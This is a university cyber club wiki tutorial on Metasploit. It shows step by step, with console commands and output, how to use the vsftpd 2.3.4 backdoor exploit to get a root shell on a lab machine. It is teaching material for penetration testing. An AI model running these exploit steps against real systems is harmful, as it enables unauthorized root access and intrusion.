UT Martin Cyber Ambassadors

User Tools

Site Tools

Trace: metasploit
metasploit

Table of Contents

Metasploit

Metasploit is a penetration testing toolkit that comes bundled with both Kali Linux and Parrot OS. It can also be download here. Metasploit greatly simplifies the act of finding and testing well known exploits and can save a penetration tester or security professional massive quantities of time over building these exploits by hand. It is user friendly with just some basic syntax that needs to be learned to get started. All the directions below apply to the Linux implementations of Metasploit.

Starting the Console

Before Metasploit is run for the first time the underlying database needs to be set up and initialized. This can be accomplished by running 

service postgresql start

Now that the database is up and running we need to initialize it to work with Metasploit with the 

msfdb-init

command.

Finding Exploits

For the purposes of this demo we already know that there is an old Ubuntu machine running at IP address 192.168.0.108, that we believe may be vulnerable to a backdoor installed in the vsftp program. The first thing we need to do then is find out if Metasploit has an exploit for this vulnerability in its database. This is easy to do with the command 

search vsftp

When we run this Metasploit returns one exploit 

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Using Exploits

To set this as the exploit that we want to use we just run the command 

use exploit/unix/ftp/vsftpd_234_backdoor

We know that it worked because the command prompt changes to show the exploit name in the prompt 

msf5 exploit(unix/ftp/vsftpd_234_backdoor) >

Before we can run the exploit we need to set a few configuration details and we can see what they are by running 

show options

Metasploit responds by showing us exactly what info it needs as can be seen below 

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

The above tells us that we need to specify a host and a port for our target and it even gives us a description of the options that we need to enter. In this case we will just need to give it an IP address as the port is already set to the default. To do so we run 

set rhosts 192.168.0.108

If we were to run 

show options

again we would see that the rhosts field would be updated with the IP address we just entered.

Payloads

If we think of an exploit as how we get in the door, then payloads are what we do once we are in the house. Not every payload will work with every exploit, so once our exploit is set, as it is now, we can run 

show payloads

and we can see a list of compatible payloads. In this case we see 

Compatible Payloads
===================

   #  Name               Disclosure Date  Rank    Check  Description
   -  ----               ---------------  ----    -----  -----------
   0  cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

This is a unix interactive shell in the target computer. To set this as the payload, we run the command 

set payload cmd/unix/interact

Finally to make sure we have everything set we run 

show options

one more time, and make sure everything looks right.

Running the Exploit

Running the exploit once everything is set is as simple as running 

exploit

Which results in 

[*] 192.168.0.108:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.108:21 - USER: 331 Please specify the password.
[+] 192.168.0.108:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.108:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.197:39837 -> 192.168.0.108:6200) at 2019-09-23 20:56:21 -0500

whoami
root

As can be seen above when we ran the whoami command we got root, meaning we know have a root shell on the target computer.

Final Thoughts

There is a ton more that can be done with Metasploit, and this is literally just the tip of the iceberg as far as functionality goes. There are scanners, reverse shells, the Meterpreter shell, and even ways to group your projects and credentials, but this should be enough to get you started with the basic functionality. For more info and the full documentation go to Metasploit Docs

metasploit.txt · Last modified: 2019/09/23 21:03 by acm

Page Tools

Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Noncommercial-Share Alike 4.0 International
CC Attribution-Noncommercial-Share Alike 4.0 International Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki